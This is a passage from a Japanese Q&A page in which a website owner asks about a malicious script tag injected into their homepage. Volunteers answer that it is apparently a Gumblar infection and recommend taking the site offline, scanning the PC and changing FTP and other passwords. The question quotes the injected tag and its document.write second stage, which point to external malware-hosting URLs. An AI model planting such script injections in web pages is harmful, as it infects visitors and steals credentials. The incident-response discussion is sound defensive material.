人力検索はてな
モバイル版を表示しています。PC版はこちら
i-mobile

自サイトをgoogleで検索すると
「このサイトはコンピュータに損害を与える可能性があります。」と
出てしまい、ホームページのソースを調べてみると
ヘッダタグとボディタグの間に組み込まれている(通常はありえない)
<script src=http://koispot.com/stagingdrupal/indexi.php ></script>
が見つかりました。

上記サイトに実際に行ってみましたが、
//
と表示されるだけですが、ソースは

//<script>
document.write("<script src=http://jumrea.co.kr/rootboard/data/uploaded/egvaa.php><\/script>");
//</script>

となっており、
そのパソコンにあるデータをいろいろと盗むためのものかもしれないな、など
と思っています。(上記URLには行っていない)

こうしたものがどのような仕組みになっているのかを教えてください。

また、対策は、私がとったように、ただ
<script src=http://koispot.com/stagingdrupal/indexi.php ></script>
をサイトから削除するだけでいいのか、を教えてください。

また、もしかしたら、自分のパソコンに入っていた、いろいろなファイルや
パスワードなどが、盗まれているのではないか、と心配しているのですが、
そのあたりも教えてください。

●質問者: ishibata
●カテゴリ:コンピュータ ウェブ制作
✍キーワード:Write このサイトはコンピュータに損害を与える可能性があります サイト ソース タグ
○ 状態 :終了
└ 回答数 : 7/7件

▽最新の回答へ

1 ● km1967
●20ポイント

Gumblarに感染したかもしれません。

  1. 当該サイトを直ちに停止する
  2. 当該サイトを更新するのに使うPCのLANケーブルを外し、ウイルスチェックを行う
  3. 少なくともサイト更新のためのFTPパスワードは盗まれている。他にも情報が盗まれている可能性が高いので、すべてのパスワードを変更すること

http://www.lac.co.jp/info/alert/alert20091119.html


2 ● kensan929
●20ポイント

あらら(^^;)

ガンブラーウィルスに感染してしまった恐れがあります。


ガンブラーウィルスとは?

http://www.nca.gr.jp/2010/netanzen/index.html


私も同様の被害に合いました。


おそらくは質問者さんのHPのindex.htmlやjsファイルに感染してしまったのではないでしょうか?


このウィルスによる影響としては、FTPのIDとパスを盗まれる危険性があります。


駆除方法としては、ソースそのものを消してしまうのが手っ取り早いですが、

また感染する恐れがあります。


WinSCPというプラグインを使うことにより、FTPのIDとパスを暗号化してしまうため盗まれる危険性はなくなります。

WinSCP導入マニュアル

http://www.cc.tsukuba.ac.jp/WinSCP/


もし、検討違いでありましたら申し訳ございませんm(__)m


http://happiness-comic.com/

URL:ダミー


3 ● juramo
●20ポイント

今でも流行っているのかは分かりませんが、

パソコンの中に入っているウィルスが

勝手にhtmlのタグを書き加えてしまうという、というものが大流行してました。


そのままサイトを放置したままだと、見た人にどんどん広がってしまうので

ウイルスの疑いがあるのならば、まずは一度サーバーからホームページを下ろすことをオススメします。


ホームページウイルスチェックで引っかかるようであれば、

まずは自分のパソコン内のウイルスチェックをして

既に感染してしまったサイトについては、

おそらくパソコン自体が感染していれば、<script src=http://koispot?を消しても

また書き換えられてしまうことが考えられますので

ご自身の使用されている、ウィルス対策ソフトのホームページなどで相談することがよいかと思います。

(市販されている大手のソフトなどでしたら、ちゃんと相談にのってもらえます)



できる限りお早めに対処されたほうがいいかと思います。


4 ● はてな
●20ポイント

私も同様の目にあいましたね。

海外のレンタルサーバーを借りてましたが。

なぜかFireFoxではダメでも、IEでは大丈夫ということもありました。

私がとった作戦はずばり、

サーバーごと解約です。

国内のサーバーにすべて移しました。

直そうとか思わない方がいいですよ。

もうサーバー内のファイルに関しては諦めた方がいいと思います。


5 ● ao-can
●10ポイント

ネットウイルスの可能性があると思います((汗

何とか対処したほうが良いかと....

ネットは色々ありますからね...(((←


1-5件表示/7件
4.前の5件|次5件6.
関連質問


●質問をもっと探す●



0.人力検索はてなトップ
8.このページを友達に紹介
9.このページの先頭へ
対応機種一覧
お問い合わせ
ヘルプ/お知らせ
ログイン
無料ユーザー登録
はてなトップ